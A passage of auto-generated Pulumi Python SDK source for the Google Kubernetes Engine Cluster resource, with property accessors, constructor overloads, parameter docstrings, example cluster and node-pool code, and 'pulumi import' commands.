@property
@pulumi.getter(name="resourceLabels")
def resource_labels(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
The GCE resource labels (a map of key/value pairs) to be applied to the cluster.
"""
return pulumi.get(self, "resource_labels")
@resource_labels.setter
def resource_labels(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "resource_labels", value)
@property
@pulumi.getter(name="resourceUsageExportConfig")
def resource_usage_export_config(self) -> Optional[pulumi.Input['ClusterResourceUsageExportConfigArgs']]:
"""
Configuration for the
[ResourceUsageExportConfig](https://cloud.google.com/kubernetes-engine/docs/how-to/cluster-usage-metering) feature.
Structure is documented below.
"""
return pulumi.get(self, "resource_usage_export_config")
@resource_usage_export_config.setter
def resource_usage_export_config(self, value: Optional[pulumi.Input['ClusterResourceUsageExportConfigArgs']]):
pulumi.set(self, "resource_usage_export_config", value)
@property
@pulumi.getter(name="selfLink")
def self_link(self) -> Optional[pulumi.Input[str]]:
"""
The server-defined URL for the resource.
"""
return pulumi.get(self, "self_link")
@self_link.setter
def self_link(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "self_link", value)
@property
@pulumi.getter(name="servicesIpv4Cidr")
def services_ipv4_cidr(self) -> Optional[pulumi.Input[str]]:
"""
The IP address range of the Kubernetes services in this
cluster, in [CIDR](http://en.wikipedia.org/wiki/Classless_Inter-Domain_Routing)
notation (e.g. `1.2.3.4/29`). Service addresses are typically put in the last
`/16` from the container CIDR.
"""
return pulumi.get(self, "services_ipv4_cidr")
@services_ipv4_cidr.setter
def services_ipv4_cidr(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "services_ipv4_cidr", value)
@property
@pulumi.getter
def subnetwork(self) -> Optional[pulumi.Input[str]]:
"""
The name or self_link of the Google Compute Engine
subnetwork in which the cluster's instances are launched.
"""
return pulumi.get(self, "subnetwork")
@subnetwork.setter
def subnetwork(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "subnetwork", value)
@property
@pulumi.getter(name="tpuIpv4CidrBlock")
def tpu_ipv4_cidr_block(self) -> Optional[pulumi.Input[str]]:
"""
The IP address range of the Cloud TPUs in this cluster, in
[CIDR](http://en.wikipedia.org/wiki/Classless_Inter-Domain_Routing)
notation (e.g. `1.2.3.4/29`).
"""
return pulumi.get(self, "tpu_ipv4_cidr_block")
@tpu_ipv4_cidr_block.setter
def tpu_ipv4_cidr_block(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "tpu_ipv4_cidr_block", value)
@property
@pulumi.getter(name="verticalPodAutoscaling")
def vertical_pod_autoscaling(self) -> Optional[pulumi.Input['ClusterVerticalPodAutoscalingArgs']]:
"""
Vertical Pod Autoscaling automatically adjusts the resources of pods controlled by it.
Structure is documented below.
"""
return pulumi.get(self, "vertical_pod_autoscaling")
@vertical_pod_autoscaling.setter
def vertical_pod_autoscaling(self, value: Optional[pulumi.Input['ClusterVerticalPodAutoscalingArgs']]):
pulumi.set(self, "vertical_pod_autoscaling", value)
@property
@pulumi.getter(name="workloadIdentityConfig")
def workload_identity_config(self) -> Optional[pulumi.Input['ClusterWorkloadIdentityConfigArgs']]:
"""
Workload Identity allows Kubernetes service accounts to act as a user-managed
[Google IAM Service Account](https://cloud.google.com/iam/docs/service-accounts#user-managed_service_accounts).
Structure is documented below.
"""
return pulumi.get(self, "workload_identity_config")
@workload_identity_config.setter
def workload_identity_config(self, value: Optional[pulumi.Input['ClusterWorkloadIdentityConfigArgs']]):
pulumi.set(self, "workload_identity_config", value)
class Cluster(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
addons_config: Optional[pulumi.Input[pulumi.InputType['ClusterAddonsConfigArgs']]] = None,
authenticator_groups_config: Optional[pulumi.Input[pulumi.InputType['ClusterAuthenticatorGroupsConfigArgs']]] = None,
cluster_autoscaling: Optional[pulumi.Input[pulumi.InputType['ClusterClusterAutoscalingArgs']]] = None,
cluster_ipv4_cidr: Optional[pulumi.Input[str]] = None,
cluster_telemetry: Optional[pulumi.Input[pulumi.InputType['ClusterClusterTelemetryArgs']]] = None,
confidential_nodes: Optional[pulumi.Input[pulumi.InputType['ClusterConfidentialNodesArgs']]] = None,
database_encryption: Optional[pulumi.Input[pulumi.InputType['ClusterDatabaseEncryptionArgs']]] = None,
datapath_provider: Optional[pulumi.Input[str]] = None,
default_max_pods_per_node: Optional[pulumi.Input[int]] = None,
default_snat_status: Optional[pulumi.Input[pulumi.InputType['ClusterDefaultSnatStatusArgs']]] = None,
description: Optional[pulumi.Input[str]] = None,
dns_config: Optional[pulumi.Input[pulumi.InputType['ClusterDnsConfigArgs']]] = None,
enable_autopilot: Optional[pulumi.Input[bool]] = None,
enable_binary_authorization: Optional[pulumi.Input[bool]] = None,
enable_intranode_visibility: Optional[pulumi.Input[bool]] = None,
enable_kubernetes_alpha: Optional[pulumi.Input[bool]] = None,
enable_l4_ilb_subsetting: Optional[pulumi.Input[bool]] = None,
enable_legacy_abac: Optional[pulumi.Input[bool]] = None,
enable_shielded_nodes: Optional[pulumi.Input[bool]] = None,
enable_tpu: Optional[pulumi.Input[bool]] = None,
identity_service_config: Optional[pulumi.Input[pulumi.InputType['ClusterIdentityServiceConfigArgs']]] = None,
initial_node_count: Optional[pulumi.Input[int]] = None,
ip_allocation_policy: Optional[pulumi.Input[pulumi.InputType['ClusterIpAllocationPolicyArgs']]] = None,
location: Optional[pulumi.Input[str]] = None,
logging_config: Optional[pulumi.Input[pulumi.InputType['ClusterLoggingConfigArgs']]] = None,
logging_service: Optional[pulumi.Input[str]] = None,
maintenance_policy: Optional[pulumi.Input[pulumi.InputType['ClusterMaintenancePolicyArgs']]] = None,
master_auth: Optional[pulumi.Input[pulumi.InputType['ClusterMasterAuthArgs']]] = None,
master_authorized_networks_config: Optional[pulumi.Input[pulumi.InputType['ClusterMasterAuthorizedNetworksConfigArgs']]] = None,
min_master_version: Optional[pulumi.Input[str]] = None,
monitoring_config: Optional[pulumi.Input[pulumi.InputType['ClusterMonitoringConfigArgs']]] = None,
monitoring_service: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
network: Optional[pulumi.Input[str]] = None,
network_policy: Optional[pulumi.Input[pulumi.InputType['ClusterNetworkPolicyArgs']]] = None,
networking_mode: Optional[pulumi.Input[str]] = None,
node_config: Optional[pulumi.Input[pulumi.InputType['ClusterNodeConfigArgs']]] = None,
node_locations: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
node_pools: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ClusterNodePoolArgs']]]]] = None,
node_version: Optional[pulumi.Input[str]] = None,
notification_config: Optional[pulumi.Input[pulumi.InputType['ClusterNotificationConfigArgs']]] = None,
pod_security_policy_config: Optional[pulumi.Input[pulumi.InputType['ClusterPodSecurityPolicyConfigArgs']]] = None,
private_cluster_config: Optional[pulumi.Input[pulumi.InputType['ClusterPrivateClusterConfigArgs']]] = None,
private_ipv6_google_access: Optional[pulumi.Input[str]] = None,
project: Optional[pulumi.Input[str]] = None,
release_channel: Optional[pulumi.Input[pulumi.InputType['ClusterReleaseChannelArgs']]] = None,
remove_default_node_pool: Optional[pulumi.Input[bool]] = None,
resource_labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
resource_usage_export_config: Optional[pulumi.Input[pulumi.InputType['ClusterResourceUsageExportConfigArgs']]] = None,
subnetwork: Optional[pulumi.Input[str]] = None,
vertical_pod_autoscaling: Optional[pulumi.Input[pulumi.InputType['ClusterVerticalPodAutoscalingArgs']]] = None,
workload_identity_config: Optional[pulumi.Input[pulumi.InputType['ClusterWorkloadIdentityConfigArgs']]] = None,
__props__=None):
"""
Manages a Google Kubernetes Engine (GKE) cluster. For more information see
[the official documentation](https://cloud.google.com/container-engine/docs/clusters)
and [the API reference](https://cloud.google.com/kubernetes-engine/docs/reference/rest/v1beta1/projects.locations.clusters).
> **Note:** All arguments and attributes, including basic auth username and
passwords as well as certificate outputs will be stored in the raw state as
plaintext. [Read more about secrets in state](https://www.pulumi.com/docs/intro/concepts/programming-model/#secrets).
## Example Usage
### With A Separately Managed Node Pool (Recommended)
```python
import pulumi
import pulumi_gcp as gcp
default = gcp.service_account.Account("default",
account_id="service-account-id",
display_name="Service Account")
primary = gcp.container.Cluster("primary",
location="us-central1",
remove_default_node_pool=True,
initial_node_count=1)
primary_preemptible_nodes = gcp.container.NodePool("primaryPreemptibleNodes",
location="us-central1",
cluster=primary.name,
node_count=1,
node_config=gcp.container.NodePoolNodeConfigArgs(
preemptible=True,
machine_type="e2-medium",
service_account=default.email,
oauth_scopes=["https://www.googleapis.com/auth/cloud-platform"],
))
```
> **Note:** It is recommended that node pools be created and managed as separate resources as in the example above.
This allows node pools to be added and removed without recreating the cluster. Node pools defined directly in the
`container.Cluster` resource cannot be removed without re-creating the cluster.
### Autopilot
```python
import pulumi
import pulumi_gcp as gcp
default = gcp.service_account.Account("default",
account_id="service-account-id",
display_name="Service Account")
primary = gcp.container.Cluster("primary",
enable_autopilot=True,
location="us-central1-a")
```
## Import
GKE clusters can be imported using the `project` , `location`, and `name`. If the project is omitted, the default provider value will be used. Examples
```sh
$ pulumi import gcp:container/cluster:Cluster mycluster projects/my-gcp-project/locations/us-east1-a/clusters/my-cluster
```
```sh
$ pulumi import gcp:container/cluster:Cluster mycluster my-gcp-project/us-east1-a/my-cluster
```
```sh
$ pulumi import gcp:container/cluster:Cluster mycluster us-east1-a/my-cluster
```
For example, the following fields will show diffs if set in config* `min_master_version` * `remove_default_node_pool`
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[pulumi.InputType['ClusterAddonsConfigArgs']] addons_config: The configuration for addons supported by GKE.
Structure is documented below.
:param pulumi.Input[pulumi.InputType['ClusterAuthenticatorGroupsConfigArgs']] authenticator_groups_config: Configuration for the
[Google Groups for GKE](https://cloud.google.com/kubernetes-engine/docs/how-to/role-based-access-control#groups-setup-gsuite) feature.
Structure is documented below.
:param pulumi.Input[pulumi.InputType['ClusterClusterAutoscalingArgs']] cluster_autoscaling: Per-cluster configuration of Node Auto-Provisioning with Cluster Autoscaler to
automatically adjust the size of the cluster and create/delete node pools based
on the current needs of the cluster's workload. See the
[guide to using Node Auto-Provisioning](https://cloud.google.com/kubernetes-engine/docs/how-to/node-auto-provisioning)
for more details. Structure is documented below.
:param pulumi.Input[str] cluster_ipv4_cidr: The IP address range of the Kubernetes pods
in this cluster in CIDR notation (e.g. `10.96.0.0/14`). Leave blank to have one
automatically chosen or specify a `/14` block in `10.0.0.0/8`. This field will
only work for routes-based clusters, where `ip_allocation_policy` is not defined.
:param pulumi.Input[pulumi.InputType['ClusterClusterTelemetryArgs']] cluster_telemetry: Configuration for
[ClusterTelemetry](https://cloud.google.com/monitoring/kubernetes-engine/installing#controlling_the_collection_of_application_logs) feature,
Structure is documented below.
:param pulumi.Input[pulumi.InputType['ClusterConfidentialNodesArgs']] confidential_nodes: Configuration for [Confidential Nodes](https://cloud.google.com/kubernetes-engine/docs/how-to/confidential-gke-nodes) feature. Structure is documented below documented below.
:param pulumi.Input[pulumi.InputType['ClusterDatabaseEncryptionArgs']] database_encryption: Structure is documented below.
:param pulumi.Input[str] datapath_provider: The desired datapath provider for this cluster. By default, uses the IPTables-based kube-proxy implementation.
:param pulumi.Input[int] default_max_pods_per_node: The default maximum number of pods
per node in this cluster. This doesn't work on "routes-based" clusters, clusters
that don't have IP Aliasing enabled. See the [official documentation](https://cloud.google.com/kubernetes-engine/docs/how-to/flexible-pod-cidr)
for more information.
:param pulumi.Input[pulumi.InputType['ClusterDefaultSnatStatusArgs']] default_snat_status: [GKE SNAT](https://cloud.google.com/kubernetes-engine/docs/how-to/ip-masquerade-agent#how_ipmasq_works) DefaultSnatStatus contains the desired state of whether default sNAT should be disabled on the cluster, [API doc](https://cloud.google.com/kubernetes-engine/docs/reference/rest/v1beta1/projects.locations.clusters#networkconfig). Structure is documented below
:param pulumi.Input[str] description: Description of the cluster.
:param pulumi.Input[pulumi.InputType['ClusterDnsConfigArgs']] dns_config: Configuration for [Using Cloud DNS for GKE](https://cloud.google.com/kubernetes-engine/docs/how-to/cloud-dns). Structure is documented below.
:param pulumi.Input[bool] enable_autopilot: Enable Autopilot for this cluster. Defaults to `false`.
Note that when this option is enabled, certain features of Standard GKE are not available.
See the [official documentation](https://cloud.google.com/kubernetes-engine/docs/concepts/autopilot-overview#comparison)
for available features.
:param pulumi.Input[bool] enable_binary_authorization: Enable Binary Authorization for this cluster.
If enabled, all container images will be validated by Google Binary Authorization.
:param pulumi.Input[bool] enable_intranode_visibility: Whether Intra-node visibility is enabled for this cluster. This makes same node pod to pod traffic visible for VPC network.
:param pulumi.Input[bool] enable_kubernetes_alpha: Whether to enable Kubernetes Alpha features for
this cluster. Note that when this option is enabled, the cluster cannot be upgraded
and will be automatically deleted after 30 days.
:param pulumi.Input[bool] enable_l4_ilb_subsetting: Whether L4ILB Subsetting is enabled for this cluster.
:param pulumi.Input[bool] enable_legacy_abac: Whether the ABAC authorizer is enabled for this cluster.
When enabled, identities in the system, including service accounts, nodes, and controllers,
will have statically granted permissions beyond those provided by the RBAC configuration or IAM.
Defaults to `false`
:param pulumi.Input[bool] enable_shielded_nodes: Enable Shielded Nodes features on all nodes in this cluster. Defaults to `true`.
:param pulumi.Input[bool] enable_tpu: Whether to enable Cloud TPU resources in this cluster.
See the [official documentation](https://cloud.google.com/tpu/docs/kubernetes-engine-setup).
:param pulumi.Input[pulumi.InputType['ClusterIdentityServiceConfigArgs']] identity_service_config: . Structure is documented below.
:param pulumi.Input[int] initial_node_count: The number of nodes to create in this
cluster's default node pool. In regional or multi-zonal clusters, this is the
number of nodes per zone. Must be set if `node_pool` is not set. If you're using
`container.NodePool` objects with no default node pool, you'll need to
set this to a value of at least `1`, alongside setting
`remove_default_node_pool` to `true`.
:param pulumi.Input[pulumi.InputType['ClusterIpAllocationPolicyArgs']] ip_allocation_policy: Configuration of cluster IP allocation for
VPC-native clusters. Adding this block enables [IP aliasing](https://cloud.google.com/kubernetes-engine/docs/how-to/ip-aliases),
making the cluster VPC-native instead of routes-based. Structure is documented
below.
:param pulumi.Input[str] location: The location (region or zone) in which the cluster
master will be created, as well as the default node location. If you specify a
zone (such as `us-central1-a`), the cluster will be a zonal cluster with a
single cluster master. If you specify a region (such as `us-west1`), the
cluster will be a regional cluster with multiple masters spread across zones in
the region, and with default node locations in those zones as well
:param pulumi.Input[pulumi.InputType['ClusterLoggingConfigArgs']] logging_config: Logging configuration for the cluster.
Structure is documented below.
:param pulumi.Input[str] logging_service: The logging service that the cluster should
write logs to. Available options include `logging.googleapis.com`(Legacy Stackdriver),
`logging.googleapis.com/kubernetes`(Stackdriver Kubernetes Engine Logging), and `none`. Defaults to `logging.googleapis.com/kubernetes`
:param pulumi.Input[pulumi.InputType['ClusterMaintenancePolicyArgs']] maintenance_policy: The maintenance policy to use for the cluster. Structure is
documented below.
:param pulumi.Input[pulumi.InputType['ClusterMasterAuthArgs']] master_auth: The authentication information for accessing the
Kubernetes master. Some values in this block are only returned by the API if
your service account has permission to get credentials for your GKE cluster. If
you see an unexpected diff unsetting your client cert, ensure you have the
`container.clusters.getCredentials` permission.
Structure is documented below.
:param pulumi.Input[pulumi.InputType['ClusterMasterAuthorizedNetworksConfigArgs']] master_authorized_networks_config: The desired
configuration options for master authorized networks. Omit the
nested `cidr_blocks` attribute to disallow external access (except
the cluster node IPs, which GKE automatically whitelists).
Structure is documented below.
:param pulumi.Input[str] min_master_version: The minimum version of the master. GKE
will auto-update the master to new versions, so this does not guarantee the
current master version--use the read-only `master_version` field to obtain that.
If unset, the cluster's version will be set by GKE to the version of the most recent
official release (which is not necessarily the latest version). Most users will find
the `container.get_engine_versions` data source useful - it indicates which versions
are available. If you intend to specify versions manually,
[the docs](https://cloud.google.com/kubernetes-engine/versioning-and-upgrades#specifying_cluster_version)
describe the various acceptable formats for this field.
:param pulumi.Input[pulumi.InputType['ClusterMonitoringConfigArgs']] monitoring_config: Monitoring configuration for the cluster.
Structure is documented below.
:param pulumi.Input[str] monitoring_service: The monitoring service that the cluster
should write metrics to.
Automatically send metrics from pods in the cluster to the Google Cloud Monitoring API.
VM metrics will be collected by Google Compute Engine regardless of this setting
Available options include
`monitoring.googleapis.com`(Legacy Stackdriver), `monitoring.googleapis.com/kubernetes`(Stackdriver Kubernetes Engine Monitoring), and `none`.
Defaults to `monitoring.googleapis.com/kubernetes`
:param pulumi.Input[str] name: The name of the cluster, unique within the project and
location.
:param pulumi.Input[str] network: The name or self_link of the Google Compute Engine
network to which the cluster is connected. For Shared VPC, set this to the self link of the
shared network.
:param pulumi.Input[pulumi.InputType['ClusterNetworkPolicyArgs']] network_policy: Configuration options for the
[NetworkPolicy](https://kubernetes.io/docs/concepts/services-networking/networkpolicies/)
feature. Structure is documented below.
:param pulumi.Input[str] networking_mode: Determines whether alias IPs or routes will be used for pod IPs in the cluster.
Options are `VPC_NATIVE` or `ROUTES`. `VPC_NATIVE` enables [IP aliasing](https://cloud.google.com/kubernetes-engine/docs/how-to/ip-aliases),
and requires the `ip_allocation_policy` block to be defined. By default when this field is unspecified, GKE will create a `ROUTES`-based cluster.
:param pulumi.Input[pulumi.InputType['ClusterNodeConfigArgs']] node_config: Parameters used in creating the default node pool.
Generally, this field should not be used at the same time as a
`container.NodePool` or a `node_pool` block; this configuration
manages the default node pool, which isn't recommended to be used.
Structure is documented below.
:param pulumi.Input[Sequence[pulumi.Input[str]]] node_locations: The list of zones in which the cluster's nodes
are located. Nodes must be in the region of their regional cluster or in the
same region as their cluster's zone for zonal clusters. If this is specified for
a zonal cluster, omit the cluster's zone.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ClusterNodePoolArgs']]]] node_pools: List of node pools associated with this cluster.
See container.NodePool for schema.
**Warning:** node pools defined inside a cluster can't be changed (or added/removed) after
cluster creation without deleting and recreating the entire cluster. Unless you absolutely need the ability
to say "these are the _only_ node pools associated with this cluster", use the
container.NodePool resource instead of this property.
:param pulumi.Input[str] node_version: The Kubernetes version on the nodes. Must either be unset
or set to the same value as `min_master_version` on create. Defaults to the default
version set by GKE which is not necessarily the latest version. This only affects
nodes in the default node pool. While a fuzzy version can be specified, it's
recommended that you specify explicit versions as the provider will see spurious diffs
when fuzzy versions are used. See the `container.get_engine_versions` data source's
`version_prefix` field to approximate fuzzy versions.
To update nodes in other node pools, use the `version` attribute on the node pool.
:param pulumi.Input[pulumi.InputType['ClusterNotificationConfigArgs']] notification_config: Configuration for the [cluster upgrade notifications](https://cloud.google.com/kubernetes-engine/docs/how-to/cluster-upgrade-notifications) feature. Structure is documented below.
:param pulumi.Input[pulumi.InputType['ClusterPodSecurityPolicyConfigArgs']] pod_security_policy_config: ) Configuration for the
[PodSecurityPolicy](https://cloud.google.com/kubernetes-engine/docs/how-to/pod-security-policies) feature.
Structure is documented below.
:param pulumi.Input[pulumi.InputType['ClusterPrivateClusterConfigArgs']] private_cluster_config: Configuration for [private clusters](https://cloud.google.com/kubernetes-engine/docs/how-to/private-clusters),
clusters with private nodes. Structure is documented below.
:param pulumi.Input[str] private_ipv6_google_access: The desired state of IPv6 connectivity to Google Services. By default, no private IPv6 access to or from Google Services (all access will be via IPv4).
:param pulumi.Input[str] project: The ID of the project in which the resource belongs. If it
is not provided, the provider project is used.
:param pulumi.Input[pulumi.InputType['ClusterReleaseChannelArgs']] release_channel: Configuration options for the [Release channel](https://cloud.google.com/kubernetes-engine/docs/concepts/release-channels)
feature, which provide more control over automatic upgrades of your GKE clusters.
When updating this field, GKE imposes specific version requirements. See
[Selecting a new release channel](https://cloud.google.com/kubernetes-engine/docs/concepts/release-channels#selecting_a_new_release_channel)
for more details; the `container.get_engine_versions` datasource can provide
the default version for a channel. Note that removing the `release_channel`
field from your config will cause the provider to stop managing your cluster's
release channel, but will not unenroll it. Instead, use the `"UNSPECIFIED"`
channel. Structure is documented below.
:param pulumi.Input[bool] remove_default_node_pool: If `true`, deletes the default node
pool upon cluster creation. If you're using `container.NodePool`
resources with no default node pool, this should be set to `true`, alongside
setting `initial_node_count` to at least `1`.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] resource_labels: The GCE resource labels (a map of key/value pairs) to be applied to the cluster.
:param pulumi.Input[pulumi.InputType['ClusterResourceUsageExportConfigArgs']] resource_usage_export_config: Configuration for the
[ResourceUsageExportConfig](https://cloud.google.com/kubernetes-engine/docs/how-to/cluster-usage-metering) feature.
Structure is documented below.
:param pulumi.Input[str] subnetwork: The name or self_link of the Google Compute Engine
subnetwork in which the cluster's instances are launched.
:param pulumi.Input[pulumi.InputType['ClusterVerticalPodAutoscalingArgs']] vertical_pod_autoscaling: Vertical Pod Autoscaling automatically adjusts the resources of pods controlled by it.
Structure is documented below.
:param pulumi.Input[pulumi.InputType['ClusterWorkloadIdentityConfigArgs']] workload_identity_config: Workload Identity allows Kubernetes service accounts to act as a user-managed
[Google IAM Service Account](https://cloud.google.com/iam/docs/service-accounts#user-managed_service_accounts).
Structure is documented below.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: Optional[ClusterArgs] = None,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Manages a Google Kubernetes Engine (GKE) cluster. For more information see
[the official documentation](https://cloud.google.com/container-engine/docs/clusters)
and [the API reference](https://cloud.google.com/kubernetes-engine/docs/reference/rest/v1beta1/projects.locations.clusters).
> **Note:** All arguments and attributes, including basic auth username and
passwords as well as certificate outputs will be stored in the raw state as
plaintext. [Read more about secrets in state](https://www.pulumi.com/docs/intro/concepts/programming-model/#secrets).
## Example Usage
### With A Separately Managed Node Pool (Recommended)
```python
import pulumi
import pulumi_gcp as gcp
default = gcp.service_account.Account("default",
account_id="service-account-id",
display_name="Service Account")
primary = gcp.container.Cluster("primary",
location="us-central1",
remove_default_node_pool=True,
initial_node_count=1)
primary_preemptible_nodes = gcp.container.NodePool("primaryPreemptibleNodes",
location="us-central1",
cluster=primary.name,
node_count=1,
node_config=gcp.container.NodePoolNodeConfigArgs(
preemptible=True,
machine_type="e2-medium",
service_account=default.email,
oauth_scopes=["https://www.googleapis.com/auth/cloud-platform"],
))
```
> **Note:** It is recommended that node pools be created and managed as separate resources as in the example above.
This allows node pools to be added and removed without recreating the cluster. Node pools defined directly in the
`container.Cluster` resource cannot be removed without re-creating the cluster.
### Autopilot
```python
import pulumi
import pulumi_gcp as gcp
default = gcp.service_account.Account("default",
account_id="service-account-id",
display_name="Service Account")
primary = gcp.container.Cluster("primary",
enable_autopilot=True,
location="us-central1-a")
```
## Import
GKE clusters can be imported using the `project` , `location`, and `name`. If the project is omitted, the default provider value will be used. Examples
```sh
$ pulumi import gcp:container/cluster:Cluster mycluster projects/my-gcp-project/locations/us-east1-a/clusters/my-cluster
```
```sh
$ pulumi import gcp:container/cluster:Cluster mycluster my-gcp-project/us-east1-a/my-cluster
```
```sh
$ pulumi import gcp:container/cluster:Cluster mycluster us-east1-a/my-cluster
```
For example, the following fields will show diffs if set in config* `min_master_version` * `remove_default_node_pool`
:param str resource_name: The name of the resource.
:param ClusterArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(ClusterArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
addons_config: Optional[pulumi.Input[pulumi.InputType['ClusterAddonsConfigArgs']]] = None,
authenticator_groups_config: Optional[pulumi.Input[pulumi.InputType['ClusterAuthenticatorGroupsConfigArgs']]] = None,
cluster_autoscaling: Optional[pulumi.Input[pulumi.InputType['ClusterClusterAutoscalingArgs']]] = None,
cluster_ipv4_cidr: Optional[pulumi.Input[str]] = None,
cluster_telemetry: Optional[pulumi.Input[pulumi.InputType['ClusterClusterTelemetryArgs']]] = None,
confidential_nodes: Optional[pulumi.Input[pulumi.InputType['ClusterConfidentialNodesArgs']]] = None,
database_encryption: Optional[pulumi.Input[pulumi.InputType['ClusterDatabaseEncryptionArgs']]] = None,
datapath_provider: Optional[pulumi.Input[str]] = None,
default_max_pods_per_node: Optional[pulumi.Input[int]] = None,
default_snat_status: Optional[pulumi.Input[pulumi.InputType['ClusterDefaultSnatStatusArgs']]] = None,
description: Optional[pulumi.Input[str]] = None,
dns_config: Optional[pulumi.Input[pulumi.InputType['ClusterDnsConfigArgs']]] = None,
enable_autopilot: Optional[pulumi.Input[bool]] = None,
enable_binary_authorization: Optional[pulumi.Input[bool]] = None,
enable_intranode_visibility: Optional[pulumi.Input[bool]] = None,
enable_kubernetes_alpha: Optional[pulumi.Input[bool]] = None,
enable_l4_ilb_subsetting: Optional[pulumi.Input[bool]] = None,
enable_legacy_abac: Optional[pulumi.Input[bool]] = None,
enable_shielded_nodes: Optional[pulumi.Input[bool]] = None,
enable_tpu: Optional[pulumi.Input[bool]] = None,
identity_service_config: Optional[pulumi.Input[pulumi.InputType['ClusterIdentityServiceConfigArgs']]] = None,
initial_node_count: Optional[pulumi.Input[int]] = None,
ip_allocation_policy: Optional[pulumi.Input[pulumi.InputType['ClusterIpAllocationPolicyArgs']]] = None,
location: Optional[pulumi.Input[str]] = None,
logging_config: Optional[pulumi.Input[pulumi.InputType['ClusterLoggingConfigArgs']]] = None,
logging_service: Optional[pulumi.Input[str]] = None,
maintenance_policy: Optional[pulumi.Input[pulumi.InputType['ClusterMaintenancePolicyArgs']]] = None,
master_auth: Optional[pulumi.Input[pulumi.InputType['ClusterMasterAuthArgs']]] = None,
master_authorized_networks_config: Optional[pulumi.Input[pulumi.InputType['ClusterMasterAuthorizedNetworksConfigArgs']]] = None,
min_master_version: Optional[pulumi.Input[str]] = None,
monitoring_config: Optional[pulumi.Input[pulumi.InputType['ClusterMonitoringConfigArgs']]] = None,
monitoring_service: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
network: Optional[pulumi.Input[str]] = None,
network_policy: Optional[pulumi.Input[pulumi.InputType['ClusterNetworkPolicyArgs']]] = None,
networking_mode: Optional[pulumi.Input[str]] = None,
node_config: Optional[pulumi.Input[pulumi.InputType['ClusterNodeConfigArgs']]] = None,
node_locations: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
node_pools: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ClusterNodePoolArgs']]]]] = None,
node_version: Optional[pulumi.Input[str]] = None,
notification_config: Optional[pulumi.Input[pulumi.InputType['ClusterNotificationConfigArgs']]] = None,
pod_security_policy_config: Optional[pulumi.Input[pulumi.InputType['ClusterPodSecurityPolicyConfigArgs']]] = None,
private_cluster_config: Optional[pulumi.Input[pulumi.InputType['ClusterPrivateClusterConfigArgs']]] = None,
private_ipv6_google_access: Optional[pulumi.Input[str]] = None,
project: Optional[pulumi.Input[str]] = None,
release_channel: Optional[pulumi.Input[pulumi.InputType['ClusterReleaseChannelArgs']]] = None,
remove_default_node_pool: Optional[pulumi.Input[bool]] = None,
resource_labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
resource_usage_export_config: Optional[pulumi.Input[pulumi.InputType['ClusterResourceUsageExportConfigArgs']]] = None,
subnetwork: Optional[pulumi.Input[str]] = None,
vertical_pod_autoscaling: Optional[pulumi.Input[pulumi.InputType['ClusterVerticalPodAutoscalingArgs']]] = None,
workload_identity_config: Optional[pulumi.Input[pulumi.InputType['ClusterWorkloadIdentityConfigArgs']]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = ClusterArgs.__new__(ClusterArgs)
__props__.__dict__["addons_config"] = addons_config
__props__.__dict__["authenticator_groups_config"] = authenticator_groups_config
__props__.__dict__["cluster_autoscaling"] = cluster_autoscaling
__props__.__dict__["cluster_ipv4_cidr"] = cluster_ipv4_cidr
__props__.__dict__["cluster_telemetry"] = cluster_telemetry
__props__.__dict__["confidential_nodes"] = confidential_nodes
__props__.__dict__["database_encryption"] = database_encryption
__props__.__dict__["datapath_provider"] = datapath_provider
__props__.__dict__["default_max_pods_per_node"] = default_max_pods_per_node
__props__.__dict__["default_snat_status"] = default_snat_status
__props__.__dict__["description"] = description
__props__.__dict__["dns_config"] = dns_config
__props__.__dict__["enable_autopilot"] = enable_autopilot
__props__.__dict__["enable_binary_authorization"] = enable_binary_authorization
__props__.__dict__["enable_intranode_visibility"] = enable_intranode_visibility
__props__.__dict__["enable_kubernetes_alpha"] = enable_kubernetes_alpha
__props__.__dict__["enable_l4_ilb_subsetting"] = enable_l4_ilb_subsetting
__props__.__dict__["enable_legacy_abac"] = enable_legacy_abac
__props__.__dict__["enable_shielded_nodes"] = enable_shielded_nodes
__props__.__dict__["enable_tpu"] = enable_tpu
__props__.__dict__["identity_service_config"] = identity_service_config
__props__.__dict__["initial_node_count"] = initial_node_count
__props__.__dict__["ip_allocation_policy"] = ip_allocation_policy
__props__.__dict__["location"] = location
__props__.__dict__["logging_config"] = logging_config
__props__.__dict__["logging_service"] = logging_service
__props__.__dict__["maintenance_policy"] = maintenance_policy
__props__.__dict__["master_auth"] = master_auth
